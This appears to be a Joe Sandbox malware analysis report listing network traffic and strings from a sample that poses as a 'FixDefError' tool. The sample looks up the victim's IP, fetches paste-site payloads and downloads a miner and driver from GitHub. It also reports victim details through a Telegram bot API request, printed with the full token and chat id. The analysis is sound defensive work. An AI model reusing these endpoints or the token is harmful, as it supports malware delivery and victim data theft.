      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /poxonjnntyfzjniyneuqfcjhmytxhlig/raw HTTP/1.1Host: rentry.coConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /poxonjnntyfzjniyneuqfcjhmytxhlig/raw HTTP/1.1Host: rentry.co
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
      Source: Joe Sandbox ViewIP Address: 104.237.62.211 104.237.62.211
      Source: global trafficHTTP traffic detected: GET /ptvejbuqtrwjccinhzedhttxvtbtyxuk/raw HTTP/1.1User-Agent: Mozilla/5.0Host: rentry.coConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /bot5940677858:AAGt9oE-xpZH11vE2TJLSl03-c0zzlh0DWk/sendMessage?chat_id=-1001719155419&text=%F0%9F%94%B9New%20Worker:%0A%20%20%E2%8A%A2%20ID:%20171010202%0A%20%20%E2%8A%A2%20IP:%2084.17.52.9%0A%20%20%E2%8A%A2%20405464%0A%20%20%E2%88%9F%20Microsoft%20Windows%2010%20Pro%0A%F0%9F%94%B8Hardware:%0A%20%20%E2%8A%A2%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0A%20%20%E2%88%9F%20V33ZTS67 HTTP/1.1User-Agent: Mozilla/5.0Host: api.telegram.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ETHMonsterM/ETHMonsterM/raw/main/cpm.exe HTTP/1.1User-Agent: Mozilla/5.0Host: github.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ETHMonsterM/ETHMonsterM/raw/main/wnnrg.sys HTTP/1.1User-Agent: Mozilla/5.0Host: github.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ETHMonsterM/ETHMonsterM/main/wnnrg.sys HTTP/1.1User-Agent: Mozilla/5.0Host: raw.githubusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ETHMonsterM/ETHMonsterM/main/cpm.exe HTTP/1.1User-Agent: Mozilla/5.0Host: raw.githubusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ptvejbuqtrwjccinhzedhttxvtbtyxuk/raw HTTP/1.1User-Agent: Mozilla/5.0Host: rentry.coConnection: Keep-Alive
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49689
      Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49688
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49686
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
      Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
      Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
      Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
      Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49689 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.1.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.1.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.1.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.1.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002E06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com
      Source: powershell.exe, 00000004.00000003.457162735.0000000007736000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.450221105.0000000007721000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, RegSvc.exe, 00000038.00000002.520725244.0000000002441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: FixDefError.exe, 00000000.00000003.271991817.000000000867C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.agfamonotype.
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: powershell.exe, 00000004.00000003.457162735.0000000007736000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.450221105.0000000007721000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: svchost.exe, 00000043.00000002.322806617.000001CFFD813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
      Source: FixDefError.exe, 00000000.00000003.253288173.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253267785.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253064803.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253083653.00000000086A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
      Source: FixDefError.exe, 00000000.00000003.253288173.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253267785.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comams
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: FixDefError.exe, 00000000.00000003.252976134.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253064803.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253039948.00000000086A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comll
      Source: FixDefError.exe, 00000000.00000003.253064803.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253083653.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253039948.00000000086A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comn
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000002.285870144.00000000011E0000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
      Source: ProgramStarter.exe, 00000001.00000003.255875959.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.255813381.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256241986.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256114080.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256014070.0000000007F12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com-s
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.255813381.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256429810.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
      Source: ProgramStarter.exe, 00000001.00000003.256839825.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256999864.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256505589.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257156939.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256680586.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256766005.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256429810.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257049259.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256241986.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256307873.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256114080.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
      Source: ProgramStarter.exe, 00000001.00000003.256505589.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256429810.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersJ
      Source: FixDefError.exe, 00000000.00000003.271991817.000000000867C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersa
      Source: ProgramStarter.exe, 00000001.00000003.255813381.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersm
      Source: ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designerss
      Source: ProgramStarter.exe, 00000001.00000003.256839825.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256999864.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257156939.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256680586.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256766005.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257049259.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com773.
      Source: ProgramStarter.exe, 00000001.00000003.256839825.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256999864.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256680586.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256766005.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257049259.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comgr
      Source: ProgramStarter.exe, 00000001.00000003.256241986.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256307873.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256114080.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comgrita
      Source: ProgramStarter.exe, 00000001.00000003.256839825.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256999864.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257198214.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256505589.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257156939.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256680586.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256766005.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256429810.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257049259.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comi
      Source: FixDefError.exe, 00000000.00000002.285870144.00000000011E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comicta
      Source: ProgramStarter.exe, 00000001.00000003.256839825.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256999864.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256505589.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256680586.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256766005.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256429810.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257049259.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comll
      Source: ProgramStarter.exe, 00000001.00000003.256241986.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256307873.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256114080.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comt
      Source: FixDefError.exe, 00000000.00000002.285870144.00000000011E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comueom8
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: FixDefError.exe, 00000000.00000003.252281963.0000000008682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnTF
      Source: ProgramStarter.exe, 00000001.00000003.257427275.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
      Source: ProgramStarter.exe, 00000001.00000002.328304357.000000000448D000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: FixDefError.exe, 00000000.00000003.254806233.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254862842.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254771694.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254676957.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254697046.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254834071.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254615093.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.254648692.00000000086A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: FixDefError.exe, 00000000.00000003.251806993.0000000008685000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kreV
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253314357.00000000086A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
      Source: FixDefError.exe, 00000000.00000003.253288173.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253267785.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comlic;
      Source: FixDefError.exe, 00000000.00000003.253288173.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253267785.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comlicz
      Source: FixDefError.exe, 00000000.00000003.253234654.00000000086A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comu
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
      Source: FixDefError.exe, 00000000.00000003.256592203.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256719673.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256707046.00000000086A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.de
      Source: FixDefError.exe, 00000000.00000003.255725744.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.255747513.00000000086A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.de-
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
      Source: FixDefError.exe, 00000000.00000003.256576400.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256691395.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256604586.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256592203.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256719673.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.256707046.00000000086A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deF
      Source: FixDefError.exe, 00000000.00000003.255774071.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.255760781.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.255805257.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.255725744.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.255747513.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.255784198.00000000086A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.dea
      Source: FixDefError.exe, 00000000.00000003.255725744.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.255747513.00000000086A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.dei
      Source: FixDefError.exe, 00000000.00000003.255725744.00000000086A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deu
      Source: FixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
      Source: svchost.exe, 00000036.00000002.516467984.000001EA2043D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
      Source: svchost.exe, 00000036.00000002.516467984.000001EA2043D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
      Source: svchost.exe, 00000036.00000002.516467984.000001EA2043D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002C69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002C69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org8:
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.328304357.000000000448D000.00000004.00000800.00020000.00000000.sdmp, RegSvc.exe, 00000038.00000002.520725244.0000000002441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5940677858:AAGt9oE-xpZH11vE2TJLSl03-c0zzlh0DWk/sendMessage?chat_id=-1001
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4
      Source: ProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
      Source: svchost.exe, 00000036.00000002.516467984.000001EA2043D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
      Source: svchost.exe, 00000036.00000002.516467984.000001EA2043D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
      Source: svchost.exe, 00000043.00000003.318327858.000001CFFD84A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
      Source: svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
      Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
      Source: svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
      Source: svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
      Source: svchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
      Source: svchost.exe, 00000043.00000003.316802969.000001CFFD84D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000043.00000002.323019726.000001CFFD853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
